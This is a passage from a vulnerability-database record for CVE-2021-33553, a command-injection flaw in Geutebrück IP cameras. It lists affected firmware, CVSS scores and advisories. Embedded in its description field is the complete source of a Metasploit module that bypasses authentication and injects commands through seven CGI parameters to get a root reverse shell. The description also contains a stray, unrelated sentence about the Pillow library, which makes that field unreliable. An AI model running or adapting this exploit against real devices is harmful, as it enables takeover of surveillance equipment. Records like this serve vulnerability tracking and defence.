        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0849",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33553",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33553",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33553",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33553",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33553",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2083",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following multiple vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK: * Lack of authentication for important features (CWE-306) - CVE-2021-33543; * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but may be as follows: * Confidential information is stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543; * Arbitrary code is executed by a remote third party through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554; * A remote third party triggers a buffer overflow in the counter parameter and arbitrary code is executed - CVE-2021-33545; * A remote third party triggers a buffer overflow in the name parameter and arbitrary code is executed - CVE-2021-33546; * A remote third party triggers a buffer overflow in the profile parameter and arbitrary code is executed - CVE-2021-33547; * A remote third party triggers a buffer overflow in the action parameter and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. 
##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. 
\n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n               
 \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                
\u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n   
 end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33553",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "id": "VAR-202109-0849",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:38:58.222000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158063"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
